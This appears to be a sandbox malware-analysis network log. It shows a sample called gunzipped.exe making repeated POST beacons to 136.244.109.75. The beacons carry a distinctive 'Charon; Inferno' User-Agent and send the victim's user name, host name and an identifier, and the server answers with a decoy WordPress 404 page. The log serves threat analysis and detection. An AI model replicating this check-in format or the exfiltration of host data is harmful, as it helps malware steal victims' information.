Apr 17, 2024 03:17:34.415337086 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:34.415358067 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49740	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:34.754471064 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:34.958280087 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:35.881505966 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:34 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:35.881575108 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:35.881664991 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:35.881704092 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:35.881743908 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:35.881783962 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:35.881824970 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:35.881865025 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:35.881903887 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:35.881944895 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49741	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:36.230211020 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:36.438620090 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:37.412234068 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:36 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:37.412298918 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:37.412337065 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:37.412374973 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:37.412411928 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:37.412450075 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:37.412491083 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:37.412528038 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:37.412570000 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:37.412610054 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.5	49742	136.244.109.75	80

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:37.986052990 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:38.194777012 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
